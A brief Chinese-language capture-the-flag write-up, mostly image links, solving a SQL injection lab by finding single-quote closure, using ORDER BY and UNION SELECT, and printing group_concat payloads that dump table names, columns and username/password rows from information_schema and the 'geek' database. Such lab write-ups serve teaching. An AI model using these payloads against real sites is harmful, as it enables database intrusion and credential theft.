data:image/s3,"s3://crabby-images/72937/7293758d3b659f2bea4674ae325ed6af3541a7c9" alt=""
进入靶场
data:image/s3,"s3://crabby-images/02c00/02c00731321a0212c62c8e41d94f3539ed9e5ba6" alt=""
data:image/s3,"s3://crabby-images/e1cb9/e1cb9f22b1350a2be73390fd2c87de02076472b9" alt=""
可知是单引号闭合,属于字符串型注入
则后续方法与字符串型无异
data:image/s3,"s3://crabby-images/3768b/3768ba475c31d9579780bd29ae46b304a0b8fe2b" alt=""
data:image/s3,"s3://crabby-images/497ae/497ae02a334f98e80767b76f521bd4a1d6eb8b17" alt=""
data:image/s3,"s3://crabby-images/5053b/5053b66247f493dabe506705b24c97a9dd1bc916" alt=""
使用order by 判断出字节数为3
data:image/s3,"s3://crabby-images/76ead/76eadd70ece546069ea1badd19a55676e17bf15c" alt=""
data:image/s3,"s3://crabby-images/69f9f/69f9f0825fb0c8b0ee3d3ef4b21c7f8642337cd0" alt=""
使用union select寻找注入点时切记第一个select为空
data:image/s3,"s3://crabby-images/7002a/7002ac47eda50927233ba9a65068eea443d78983" alt=""
data:image/s3,"s3://crabby-images/825ce/825ce42f14f8c46fb445a7120e8f462069f46424" alt=""
库名geek
data:image/s3,"s3://crabby-images/1e8b0/1e8b029758f77f2c2b4642540ae6c6733a9e29cc" alt=""
data:image/s3,"s3://crabby-images/5bc93/5bc93f32c5c619340498e9683e5a6926864442bf" alt=""
表名group_concat(table_name) from information_schema.tables where table_schema='geek'#
geekuser l0ve1ysq1
data:image/s3,"s3://crabby-images/c937e/c937e87b7940f4f23fdd00dabaaee587d23e40fd" alt=""
字段名group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
id username password
data:image/s3,"s3://crabby-images/4d91f/4d91f8c03d2a5d190a97a1d9e2dd1dc9945231d7" alt=""
group_concat(column_name) from information_schema.columns where table_name='geekuser'#
data:image/s3,"s3://crabby-images/fe715/fe715ba393fd34e0bd5dedc6b3dc0795bd3f5999" alt=""
可知两个表字段名相同
查询字段内容
group_concat(id,username,password) from geek.l0ve1ysq1#
group_concat(id,username,password) from geek.geekuser#
data:image/s3,"s3://crabby-images/dd680/dd680f0486278044db52158c8358bfb4469afe02" alt=""
得到flag
笔记
1,本题考查字符串类型的注入
2,group_concat(id,username,password) from geek.geekuser#
一次可以爆出表格所有内容